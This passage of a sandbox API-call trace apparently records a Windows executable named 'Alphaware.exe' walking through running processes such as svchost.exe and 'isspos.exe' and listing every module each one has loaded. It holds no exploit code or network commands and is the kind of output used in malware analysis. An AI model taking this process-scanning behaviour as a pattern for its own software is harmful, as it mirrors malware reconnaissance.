cb=0x18 | out: lpmodinfo=0x2548e78*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.912] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.912] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.913] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x254b038, cb=0x18 | out: lpmodinfo=0x254b038*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0053.913] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0053.913] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0053.914] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x254d1f8, cb=0x18 | out: lpmodinfo=0x254d1f8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0053.914] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0053.914] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0053.915] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x254f3c8, cb=0x18 | out: lpmodinfo=0x254f3c8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0053.915] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0053.916] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0053.916] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x414) returned 0x218 [0053.917] EnumProcessModules (in: hProcess=0x218, lphModule=0x2551ad8, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2551ad8, lpcbNeeded=0x41eb20) returned 1 [0053.920] EnumProcessModules (in: hProcess=0x218, lphModule=0x2551cf0, cb=0x400, lpcbNeeded=0x41eb20 | out: lphModule=0x2551cf0, lpcbNeeded=0x41eb20) returned 1 [0053.924] GetModuleInformation (in: hProcess=0x218, hModule=0xff760000, lpmodinfo=0x2552160, cb=0x18 | out: lpmodinfo=0x2552160*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0053.924] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff760000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0053.924] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff760000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0053.925] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2554358, cb=0x18 | out: lpmodinfo=0x2554358*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.925] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.925] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.926] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x2556518, cb=0x18 | out: lpmodinfo=0x2556518*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0053.926] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0053.926] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0053.927] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x25586e8, cb=0x18 | out: lpmodinfo=0x25586e8*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0053.927] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0053.927] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0053.928] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x255a8b8, cb=0x18 | out: lpmodinfo=0x255a8b8*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0053.928] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0053.929] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0053.929] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x255cae8, cb=0x18 | out: lpmodinfo=0x255cae8*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0053.930] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0053.930] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0053.931] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x255eca8, cb=0x18 | out: lpmodinfo=0x255eca8*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0053.931] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0053.932] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0053.932] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x2560e68, cb=0x18 | out: lpmodinfo=0x2560e68*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0053.933] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0053.934] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0053.934] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x2563028, cb=0x18 | out: lpmodinfo=0x2563028*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0053.935] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0053.935] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0053.936] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x2565280, cb=0x18 | out: lpmodinfo=0x2565280*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0053.937] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0053.937] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0054.220] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe10) returned 0x0 [0054.223] EnumProcesses (in: lpidProcess=0x25ea340, cb=0x400, lpcbNeeded=0x41ea08 | out: lpidProcess=0x25ea340, lpcbNeeded=0x41ea08) returned 1 [0054.227] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x41e660, nSize=0x101, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0054.246] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa34) returned 0x21c [0054.246] EnumProcessModules (in: hProcess=0x21c, lphModule=0x25eb098, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25eb098, lpcbNeeded=0x41eb20) returned 1 [0054.247] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.247] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x13b0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="isspos.exe") returned 0xa [0054.248] CoTaskMemFree (pv=0x783720) [0054.248] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.248] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x13b0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Program Files\\MSBuild\\isspos.exe" (normalized: "c:\\program files\\msbuild\\isspos.exe")) returned 0x23 [0054.248] CoTaskMemFree (pv=0x783720) [0054.248] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x25ed508, cb=0x18 | out: lpmodinfo=0x25ed508*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0054.249] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.249] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0054.249] CoTaskMemFree (pv=0x783720) [0054.249] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.249] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0054.250] CoTaskMemFree (pv=0x783720) [0054.250] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x25ef6c8, cb=0x18 | out: lpmodinfo=0x25ef6c8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0054.250] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.250] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0054.251] CoTaskMemFree (pv=0x783720) [0054.251] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.251] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0054.251] CoTaskMemFree (pv=0x783720) [0054.251] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x25f1888, cb=0x18 | out: lpmodinfo=0x25f1888*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0054.252] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.252] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0054.252] CoTaskMemFree (pv=0x783720) [0054.253] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.253] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0054.253] CoTaskMemFree (pv=0x783720) [0054.253] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x25f3a58, cb=0x18 | out: lpmodinfo=0x25f3a58*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0054.254] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.254] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0054.254] CoTaskMemFree (pv=0x783720) [0054.254] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.254] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0054.255] CoTaskMemFree (pv=0x783720) [0054.255] CloseHandle (hObject=0x21c) returned 1 [0054.256] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0054.256] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x344) returned 0x21c [0054.256] EnumProcessModules (in: hProcess=0x21c, lphModule=0x25f6168, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25f6168, lpcbNeeded=0x41eb20) returned 1 [0054.267] EnumProcessModules (in: hProcess=0x21c, lphModule=0x25f6380, cb=0x400, lpcbNeeded=0x41eb20 | out: lphModule=0x25f6380, lpcbNeeded=0x41eb20) returned 1 [0054.272] GetModuleInformation (in: hProcess=0x21c, hModule=0xff760000, lpmodinfo=0x25f67f0, cb=0x18 | out: lpmodinfo=0x25f67f0*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0054.272] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.272] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0xff760000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0054.273] CoTaskMemFree (pv=0x783720) [0054.273] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.273] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0xff760000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0054.273] CoTaskMemFree (pv=0x783720) [0054.273] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x25f89e8, cb=0x18 | out: lpmodinfo=0x25f89e8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0054.274] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.274] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0054.274] CoTaskMemFree (pv=0x783720) [0054.274] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.274] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0054.275] CoTaskMemFree (pv=0x783720) [0054.275] GetModuleInformation (in: hProcess=0x21c, hModule=0x77710000, lpmodinfo=0x25fabc0, cb=0x18 | out: lpmodinfo=0x25fabc0*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0054.275] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.275] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77710000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0054.276] CoTaskMemFree (pv=0x783720) [0054.276] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.276] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77710000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0054.276] CoTaskMemFree (pv=0x783720) [0054.276] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd910000, lpmodinfo=0x25fcd90, cb=0x18 | out: lpmodinfo=0x25fcd90*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0054.277] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.277] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd910000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0054.277] CoTaskMemFree (pv=0x783720) [0054.277] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.277] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd910000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0054.278] CoTaskMemFree (pv=0x783720) [0054.278] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff100000, lpmodinfo=0x25fef60, cb=0x18 | out: lpmodinfo=0x25fef60*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0054.278] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.279] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff100000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0054.279] CoTaskMemFree (pv=0x783720) [0054.279] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.279] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff100000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0054.280] CoTaskMemFree (pv=0x783720) [0054.280] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefee80000, lpmodinfo=0x2601178, cb=0x18 | out: lpmodinfo=0x2601178*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0054.280] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.280] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefee80000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0054.281] CoTaskMemFree (pv=0x783720) [0054.281] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.281] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefee80000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0054.282] CoTaskMemFree (pv=0x783720) [0054.282] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefdb50000, lpmodinfo=0x2603338, cb=0x18 | out: lpmodinfo=0x2603338*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0054.282] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.283] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefdb50000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0054.283] CoTaskMemFree (pv=0x783720) [0054.283] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.283] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefdb50000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0054.284] CoTaskMemFree (pv=0x783720) [0054.284] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff760000, lpmodinfo=0x26054f8, cb=0x18 | out: lpmodinfo=0x26054f8*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0054.285] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.285] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff760000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0054.286] CoTaskMemFree (pv=0x783720) [0054.286] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.286] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff760000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0054.287] CoTaskMemFree (pv=0x783720) [0054.287] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff1c0000, lpmodinfo=0x26076b8, cb=0x18 | out: lpmodinfo=0x26076b8*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0054.287] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.287] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff1c0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0054.288] CoTaskMemFree (pv=0x783720) [0054.288] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.288] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff1c0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0054.289] CoTaskMemFree (pv=0x783720) [0054.289] GetModuleInformation (in: hProcess=0x21c, hModule=0x77610000, lpmodinfo=0x2609910, cb=0x18 | out: lpmodinfo=0x2609910*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0054.290] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.290] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77610000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0054.291] CoTaskMemFree (pv=0x783720) [0054.291] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.291] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77610000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0054.292] CoTaskMemFree (pv=0x783720) [0054.292] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff350000, lpmodinfo=0x260bad0, cb=0x18 | out: lpmodinfo=0x260bad0*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0054.293] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.293] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff350000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0054.294] CoTaskMemFree (pv=0x783720) [0054.294] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.294] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff350000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0054.295] CoTaskMemFree (pv=0x783720) [0054.295] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff690000, lpmodinfo=0x260dc80, cb=0x18 | out: lpmodinfo=0x260dc80*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0054.296] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.296] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff690000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0054.297] CoTaskMemFree (pv=0x783720) [0054.297] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.297] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff690000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0054.298] CoTaskMemFree (pv=0x783720) [0054.298] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff400000, lpmodinfo=0x260fe40, cb=0x18 | out: lpmodinfo=0x260fe40*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0054.298] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.298] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff400000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0054.299] CoTaskMemFree (pv=0x783720) [0054.299] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.299] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff400000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0054.300] CoTaskMemFree (pv=0x783720) [0054.301] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff9d0000, lpmodinfo=0x2612000, cb=0x18 | out: lpmodinfo=0x2612000*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0054.301] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.301] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff9d0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0054.302] CoTaskMemFree (pv=0x783720) [0054.302] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.303] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff9d0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0054.304] CoTaskMemFree (pv=0x783720) [0054.304] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd670000, lpmodinfo=0x26141c0, cb=0x18 | out: lpmodinfo=0x26141c0*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0054.305] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.305] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd670000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0054.306] CoTaskMemFree (pv=0x783720) [0054.306] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.306] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd670000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0054.307] CoTaskMemFree (pv=0x783720) [0054.307] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff430000, lpmodinfo=0x2616390, cb=0x18 | out: lpmodinfo=0x2616390*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, 